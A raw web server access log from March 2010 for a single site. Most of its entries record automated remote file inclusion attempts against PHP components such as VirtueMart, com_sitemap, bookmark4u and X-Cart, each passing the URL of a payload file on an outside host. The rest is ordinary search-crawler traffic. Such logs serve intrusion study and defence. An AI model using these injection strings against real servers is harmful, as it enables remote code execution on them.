213.251.189.206 - - [08/Mar/2010:16:30:20 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:30:57 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:30:57 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:30:59 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:34:27 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
99.57.90.154 - - [08/Mar/2010:16:36:23 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:37:29 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
93.158.149.32 - - [08/Mar/2010:16:38:10 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:16:38:28 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:38:39 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:38:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:38:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:38:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:38:48 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:38:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [08/Mar/2010:16:43:05 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:57:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:57:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:57:57 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:58:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:58:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:16:58:07 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [08/Mar/2010:17:00:03 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:42 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:42 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:42 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:46 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:46 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:46 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:56 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:56 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:56 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:57 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:57 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:57 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:58 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:58 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:00:58 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:05 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:05 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:05 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:10 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:11 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:11 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:11 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:11 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:11 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:11 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:11 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:01:11 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.230.162.220 - - [08/Mar/2010:17:03:48 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:17:03:48 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:17:03:48 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:17:04:18 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:17:04:18 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.230.162.220 - - [08/Mar/2010:17:04:18 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
24.138.67.66 - - [08/Mar/2010:17:06:08 -0800] "GET / HTTP/1.1" 200 779 "http://ordering-live-lobster.wholesalelobster.ca" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:17:14:24 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
207.46.199.48 - - [08/Mar/2010:17:23:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "redneckmba.com"
207.46.199.48 - - [08/Mar/2010:17:24:55 -0800] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "redneckmba.com"
66.163.171.206 - - [08/Mar/2010:17:27:35 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:30:42 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:30:42 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:30:42 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:30:49 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:30:49 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:30:49 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:31:01 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:31:01 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:17:31:01 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:17:49:26 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [08/Mar/2010:17:51:37 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:18:02:05 -0800] "GET /include/prodler.class.php?sPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.12.239 - - [08/Mar/2010:18:02:05 -0800] "GET /logs//include/prodler.class.php?sPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.12.239 - - [08/Mar/2010:18:02:06 -0800] "GET /logs/access.log%20%20//include/prodler.class.php?sPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.12.239 - - [08/Mar/2010:18:05:42 -0800] "GET /include/prodler.class.php?sPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:18:05:42 -0800] "GET /logs//include/prodler.class.php?sPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:18:05:42 -0800] "GET /logs/access.log//include/prodler.class.php?sPath=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.206 - - [08/Mar/2010:18:11:52 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
206.123.108.110 - - [08/Mar/2010:18:24:33 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
206.123.108.110 - - [08/Mar/2010:18:24:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
206.123.108.110 - - [08/Mar/2010:18:24:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ocprojects.com/images/logo1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:18:27:39 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:18:27:39 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:18:27:40 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.141.1.113 - - [08/Mar/2010:18:30:41 -0800] "GET /ver2/bbs/bbs//write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.141.1.113 - - [08/Mar/2010:18:30:41 -0800] "GET /logs/access.log//ver2/bbs/bbs//write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.141.1.113 - - [08/Mar/2010:18:30:41 -0800] "GET /logs//ver2/bbs/bbs//write_comment_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
209.126.254.139 - - [08/Mar/2010:18:38:16 -0800] "GET /admin/auth.php?xcart_dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.126.254.139 - - [08/Mar/2010:18:38:17 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.126.254.139 - - [08/Mar/2010:18:38:17 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.105 - - [08/Mar/2010:18:38:46 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [08/Mar/2010:18:55:01 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
82.76.12.197 - - [08/Mar/2010:18:55:47 -0800] "GET /logs/access.log//include/prodler.class.php?sPath=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
82.76.12.197 - - [08/Mar/2010:18:55:49 -0800] "GET /include/prodler.class.php?sPath=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
82.76.12.197 - - [08/Mar/2010:18:55:49 -0800] "GET /logs//include/prodler.class.php?sPath=http://alice-t.dk/cache/indc.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "redneckmba.com"
200.93.147.154 - - [08/Mar/2010:18:58:12 -0800] "GET /logs///bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:18:58:12 -0800] "GET //bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
200.93.147.154 - - [08/Mar/2010:18:58:18 -0800] "GET /logs/access.log%20%20///bbs/write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.38.12.239 - - [08/Mar/2010:19:18:10 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:19:18:11 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:19:18:12 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:19:23:21 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.123.195 - - [08/Mar/2010:19:25:55 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:19:27:28 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
93.158.149.32 - - [08/Mar/2010:19:31:41 -0800] "GET /logs/access.log HTTP/1.1" 200 321606 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.redneckmba.com"
207.46.199.38 - - [08/Mar/2010:19:33:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
207.46.199.38 - - [08/Mar/2010:19:34:43 -0800] "GET /logs/scripts.log HTTP/1.1" 200 1439644 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
66.163.171.205 - - [08/Mar/2010:19:38:16 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:19:49:01 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:19:49:01 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
121.88.4.74 - - [08/Mar/2010:19:49:01 -0800] "GET /logs/access.log/bbs/write_update.php?board_skin_path=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:55:53 -0800] "GET //?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:55:53 -0800] "GET /logs///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:56:02 -0800] "GET /logs/access.log%20%20///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:55:56 -0800] "GET //?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:55:56 -0800] "GET /logs///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:55:57 -0800] "GET /logs/access.log%20%20///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:55:58 -0800] "GET //?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:55:58 -0800] "GET /logs///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 1945 "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:19:55:58 -0800] "GET /logs/access.log%20%20///?act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:20:00:12 -0800] "GET /logs/access.log%20%20//admin.joomlaradiov5.php?mosConfig_live_site=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
